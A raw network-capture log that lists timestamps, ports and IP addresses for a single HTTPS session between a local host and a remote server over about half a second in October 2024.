Oct 8, 2024 20:52:12.116449118 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.116472960 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.117238998 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.117253065 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.117288113 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.117299080 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.117312908 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.124955893 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.124979019 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.125024080 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.125036001 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.125061989 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.126038074 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.126053095 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.126099110 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.126110077 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.126132965 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.126585007 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.126602888 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.126655102 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.126655102 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.126665115 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.126699924 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.126792908 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.126808882 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.126859903 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.126869917 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.127073050 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.127089977 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.127125025 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.127131939 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.127172947 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.127336025 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.127356052 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.127403021 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.127409935 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.127501011 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.127517939 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.127551079 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.127558947 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.127573967 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.127685070 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.127700090 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.127731085 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.127739906 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.127757072 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.171478987 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.214230061 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.214257956 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.214310884 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.214332104 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.214350939 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.214376926 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.215034008 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.215054035 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.215114117 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.215122938 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.215159893 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.215363026 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.215409040 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.215425968 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.215432882 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.215455055 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.215467930 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.215679884 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.215696096 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.215747118 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.215754032 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.215790987 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.215850115 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.215866089 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.215934992 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.215934992 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.215945005 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.215982914 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.216111898 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.216126919 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.216171026 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.216176987 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.216214895 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.217431068 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.217447996 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.217498064 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.217505932 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.217622995 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.217643976 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.217648983 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.217660904 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.217675924 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.217710018 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.331751108 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.331772089 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.331851006 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.331866026 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.331933975 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.332254887 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.332269907 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.332310915 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.332317114 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.332339048 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.332362890 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.332413912 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.332431078 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.332470894 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.332477093 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.332544088 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.332676888 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.332693100 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.332777023 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.332782984 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.332905054 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.332982063 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.332995892 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.333077908 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.333086014 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.333127022 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.333215952 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.333230972 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.333302975 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.333312035 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.333360910 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.333709955 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.333724976 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.333786964 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.333795071 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.333837032 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.334053993 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.334069014 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.334111929 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.334117889 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.334170103 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.440896988 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.440927982 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.441047907 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.441060066 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.441103935 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.441164970 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.441183090 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.441221952 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.441227913 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.441286087 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.441334963 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.441355944 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.441365957 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.441370010 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.441381931 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.441428900 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.441550016 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.441565037 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.441598892 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.441602945 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.441621065 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.441641092 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.441978931 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.441997051 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.442042112 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.442045927 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.442071915 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.442082882 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.442213058 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.442228079 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.442265987 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.442270994 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.442280054 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.442296982 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.442317009 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.442322969 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.442334890 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.442351103 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.442373991 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.442679882 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.442698002 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.442733049 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.442738056 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.442764044 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.442776918 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.528783083 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.528805971 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.528866053 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.528884888 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.528922081 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.528934956 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.529105902 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.529125929 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.529175043 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.529181004 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.529201031 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.529217958 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.529367924 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.529381990 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.529431105 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.529438019 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.529470921 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.529632092 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.529648066 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.529704094 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.529710054 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.529747009 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.529963970 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.529978991 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.530036926 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.530042887 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.530081034 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.530181885 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.530195951 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.530229092 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.530234098 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.530282021 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.530524015 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.530538082 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.530586958 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.530591965 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.530639887 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.530786991 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.530801058 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.530854940 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.530859947 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.530905962 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.617230892 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.617254019 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.617336035 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.617346048 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.617386103 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.617530107 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.617544889 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.617594957 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.617599964 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.617636919 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.617891073 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.617907047 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.617969036 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.617973089 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.618031979 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.618355989 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.618371010 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.618429899 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.618434906 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.618478060 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.618706942 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.618722916 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.618782997 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.618787050 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.618798971 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.618822098 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.618823051 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.618834019 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.618855000 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.618881941 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.619165897 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.619182110 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.619244099 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.619250059 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.619294882 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.619486094 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.619503975 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.619741917 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.619746923 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.619793892 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.706804991 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.706835985 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.706937075 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.706954002 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.707010984 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.707341909 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.707360983 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.707427025 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.707432985 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.707479000 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.707575083 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.707592010 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.707648039 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.707653999 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.707680941 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.707700968 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.707812071 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.707829952 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.707875967 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.707881927 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.707925081 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.708966017 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.708991051 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.709045887 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.709052086 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.709075928 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.709100962 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.710305929 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.710321903 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.710383892 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.710391045 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.710428953 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.713408947 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.713432074 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.713488102 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.713495970 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.713510036 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.713562012 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.714765072 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.714780092 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.714848995 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.714855909 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.714920998 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.795056105 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.795075893 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.795171976 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.795183897 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.795221090 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.795608044 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.795624971 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.795696974 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.795702934 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.795753002 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.796042919 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.796061039 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.796123981 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.796132088 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.796183109 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.796412945 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.796435118 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.796489000 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.796494961 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.796541929 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.797528028 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.797548056 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.797612906 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.797617912 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.797652960 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.799032927 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.799052000 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.799108028 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.799112082 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.799145937 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.801877022 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.801899910 CEST	443	49706	188.114.96.3	192.168.2.8
